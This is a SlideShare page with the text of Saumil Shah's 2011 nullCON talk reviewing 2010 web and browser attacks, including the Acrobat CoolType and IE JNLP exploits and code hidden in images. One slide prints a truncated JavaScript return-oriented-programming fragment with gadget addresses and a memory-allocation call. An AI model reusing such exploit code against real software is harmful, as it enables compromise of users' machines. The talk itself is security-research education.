2010: A Net Odyssey<br />Saumil Shah<br />nullCON Goa<br />26.02.2011<br />
Welcome to NullCON!<br />nullcon.net | null.co.in<br />
# who am i<br />Saumil Shah - CEO Net-Square<br />saumilshah<br />हैकर<br />હેકર<br />Hacker<br />भाषा अनेक लक्ष्य एक<br />
What<br />did we<br />learn from<br />?<br />
ATTACK SURFACE 2010-2011<br />5<br />
5<br />33%<br />MORE!<br />
5<br />With JIT!Fights DEP, ASLR!<br />
5<br />Worldwide coverage,<br />Hides your tracks.<br />
5<br />...as never seen before!<br />
5<br />GUARANTEED!!<br />Fresh new bugs,<br />Present on most computers<br />
"The amount of intelligence in the world is constant.<br />And the population is increasing."<br />
It's SPLOIT TIME!<br />
Jedi A/V Tricks<br />These are not the sploitz you're looking for.<br />
Obfuscated Javascript decoded without using eval, document.write, etc.<br />See no eval!<br />Acrobat CoolType<br />exploi...
High Tech vs. Low Tech<br />Acrobat CoolType exploit<br />Return Oriented Programming code<br />Escape-From-PDF<br />No fa...
This iz what ?<br />
I'm an evil Javascript<br />I'm an innocent image<br />
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.s...
W3C<br />"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le...
Application Delivery<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<br />
Application Delivery<br />The Web<br />at present<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<...
The FUTURE is HERE!<br />
No longer Science Fiction<br />
Keep onpatching!<br />
I can haz sandbox<br />I Also Can!<br />
The Solution?<br />HTML 8.0<br />HTTP 2.0<br />Browser Security Model<br />Self Contained Apps<br />
n|u<br />dwitiya<br />kthxbai<br />saumil@net-square.com<br />slideshare.net/saumilshah<br />www.net-square.com<br />
Upcoming SlideShare
Loading in...5
×

2010 A Net Odyssey

876

Published on

This talk looks back at 2010 - a very imporant year in the area of Internet Security.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
876
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • Flash Sprays, JIT sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • JNLP IE8 exploit on Win7Adobe Cooltype exploit on Win7IE8CSS exploit on Win7
  • Sandboxing isn&apos;t the solution.
  • 2010 A Net Odyssey

    1. 1. 2010: A Net Odyssey<br />Saumil Shah<br />nullCON Goa<br />26.02.2011<br />
    2. 2. Welcome to NullCON!<br />nullcon.net | null.co.in<br />
    3. 3. # who am i<br />Saumil Shah - CEO Net-Square<br />saumilshah<br />हैकर<br />હેકર<br />Hacker<br />भाषा अनेक लक्ष्य एक<br />
    4. 4. What<br />did we<br />learn from<br />?<br />
    5. 5.
    6. 6.
    7. 7. ATTACK SURFACE 2010-2011<br />5<br />
    8. 8. 5<br />33%<br />MORE!<br />
    9. 9. 5<br />With JIT!Fights DEP, ASLR!<br />
    10. 10. 5<br />Worldwide coverage,<br />Hides your tracks.<br />
    11. 11. 5<br />...as never seen before!<br />
    12. 12. 5<br />GUARANTEED!!<br />Fresh new bugs,<br />Present on most computers<br />
    13. 13. "The amount of intelligence in the world is constant.<br />And the population is increasing."<br />
    14. 14.
    15. 15.
    16. 16.
    17. 17. It's SPLOIT TIME!<br />
    18. 18. Jedi A/V Tricks<br />These are not the sploitz you're looking for.<br />
    19. 19. Obfuscated Javascript decoded without using eval, document.write, etc.<br />See no eval!<br />Acrobat CoolType<br />exploit<br />IE+JNLP exploit<br />
    20. 20. High Tech vs. Low Tech<br />Acrobat CoolType exploit<br />Return Oriented Programming code<br />Escape-From-PDF<br />No fancy tricks<br />
    21. 21. This iz what ?<br />
    22. 22. I'm an evil Javascript<br />I'm an innocent image<br />
    23. 23. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""<br /><CANVAS><br />
    24. 24.
    25. 25.
    26. 26.
    27. 27. W3C<br />"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]<br />
    28. 28. Application Delivery<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<br />
    29. 29. Application Delivery<br />The Web<br />at present<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<br />HTTP<br />HTML<br />AJAX<br />Flash<br />Sandbox<br />HTML5<br />Anti-XSS<br />WAF<br />Silverlight<br />Web sockets<br />
    30. 30. The FUTURE is HERE!<br />
    31. 31. No longer Science Fiction<br />
    32. 32.
    33. 33. Keep onpatching!<br />
    34. 34. I can haz sandbox<br />I Also Can!<br />
    35. 35. The Solution?<br />HTML 8.0<br />HTTP 2.0<br />Browser Security Model<br />Self Contained Apps<br />
    36. 36. n|u<br />dwitiya<br />kthxbai<br />saumil@net-square.com<br />slideshare.net/saumilshah<br />www.net-square.com<br />

    ×